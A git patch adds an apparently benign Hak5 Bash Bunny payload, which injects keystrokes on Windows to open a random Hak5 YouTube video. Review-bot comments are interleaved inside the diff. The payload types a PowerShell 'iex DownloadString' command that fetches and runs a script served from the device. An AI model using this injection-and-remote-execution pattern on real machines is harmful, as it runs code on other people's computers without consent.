From 946879ae909f7b4f807f89d784ec07a1acf8c710 Mon Sep 17 00:00:00 2001
From: cribb-it <24548670+cribb-it@users.noreply.github.com>
Date: Wed, 16 Mar 2022 21:28:18 +0000
Subject: [PATCH] New Payload - Random vid (#504)

* readme
* Payload
---
 .../general/Win_PoSH_RandomVid/payload.txt | 33 +++++++++++++++++++
 .../general/Win_PoSH_RandomVid/readme.md | 24 ++++++++++++++
 payloads/library/general/Win_PoSH_RandomVid/s | 24 ++++++++++++++
 3 files changed, 81 insertions(+)
 create mode 100644 payloads/library/general/Win_PoSH_RandomVid/payload.txt
 create mode 100644 payloads/library/general/Win_PoSH_RandomVid/readme.md
 create mode 100644 payloads/library/general/Win_PoSH_RandomVid/s

diff --git a/payloads/library/general/Win_PoSH_RandomVid/payload.txt b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
new file mode 100644
index 00000000..1d2e874e
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/payload.txt
@@ -0,0 +1,33 @@
+#!/bin/bash
+# Title: Random Video
+# Description: Downloads a list of vids from YouTube. Then pick a random one then opens it.
+# Author: Cribbit
+# Version: 1.0
+# Category: General
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: RNDIS_ETHERNET HID
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 300
+RUN WIN "powershell -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/general/Win_PoSH_RandomVid/readme.md b/payloads/library/general/Win_PoSH_RandomVid/readme.md
new file mode 100644
index 00000000..7008f5fb
--- /dev/null
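Review bot: The readiness loop `while ! nc -z localhost 80; do sleep 0.2; done` has no upper bound, so if `python -m SimpleHTTPServer 80 &` fails to start (port already in use, or a Python 3-only image where that module name no longer exists) the payload spins forever at LED SPECIAL with nothing reported. A bounded wait such as `for _ in {1..50}; do nc -z localhost 80 && break; sleep 0.2; done` lets it fail visibly instead. The `cd /root/udisk/payloads/$SWITCH_POSITION/` above it is unquoted and unchecked, so a failed cd leaves the server exporting whatever the current directory happens to be; `cd "/root/udisk/payloads/$SWITCH_POSITION/" || exit 1` closes that gap. The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule is appended on every run and never removed, so repeated runs stack duplicate rules and outbound DNS stays blocked on the device after the payload ends; undo it with `iptables -D OUTPUT -p udp --dport 53 -j DROP` before `LED FINISH`, and stop the backgrounded server there too with the pid captured from `$!` right after the `&`.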
+++ b/payloads/library/general/Win_PoSH_RandomVid/readme.md
@@ -0,0 +1,24 @@
+# Random Video
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: General
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Downloads a list of Hak5 vids from YouTube (about 15 in the rss feed).
+
+Then pick one at random, then opens it in the browser.
+
+## Colours
+| Status | Colour | Description |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished |
\ No newline at end of file
diff --git a/payloads/library/general/Win_PoSH_RandomVid/s b/payloads/library/general/Win_PoSH_RandomVid/s
new file mode 100644
index 00000000..20ddb97b
--- /dev/null
+++ b/payloads/library/general/Win_PoSH_RandomVid/s
@@ -0,0 +1,24 @@
+# Get the RSS feed for the Hak5 Channel
+Write-Output "Connecting to youtube"
+$Response = Invoke-WebRequest -Uri "https://www.youtube.com/feeds/videos.xml?channel_id=UC3s0BtrBJpwNDaflRSoiieQ" -UseBasicParsing -ContentType "application/xml"
+Write-Output $Response.StatusCode
+# See if it successful
+If ($Response.StatusCode -eq "200") {
+ # set the XML
+ $Xml = [xml]$Response.Content
+ $Entries = @()
+ # Loop each entry creating an object
+ ForEach ($Entry in $Xml.feed.entry) {
+ $Entries += [PSCustomObject] @{
+ 'Updated' = [datetime]$Entry.updated
+ 'Title' = $Entry.title
+ 'Link' = $Entry.Link.href
+ }
+ }
+ # Gets a random number
+ $int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)
+ $Entry = $Entries[$int]
+ # Opens link
+ Start-Process $Entry.Link
+ Write-Output $Entry.Title
+}
\ No newline at end of file
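Review bot: `$int = (Get-Random -Maximum ($Entries.Count -1) -Minimum 0)` can never select the last feed entry, because `-Maximum` is exclusive, and when the feed yields one entry or none `-Maximum` is not greater than `-Minimum` and Get-Random throws. `$int = Get-Random -Maximum $Entries.Count` covers every entry, and a preceding `if ($Entries.Count -eq 0) { return }` guard avoids the error on an empty feed. The `If ($Response.StatusCode -eq "200")` check is also largely dead: on PowerShell 5.1 Invoke-WebRequest terminates with an exception on a non-2xx status or a network failure rather than returning a response, so the failure path belongs in a try/catch around the request, and the `-ContentType "application/xml"` argument only describes a request body and does nothing on this GET.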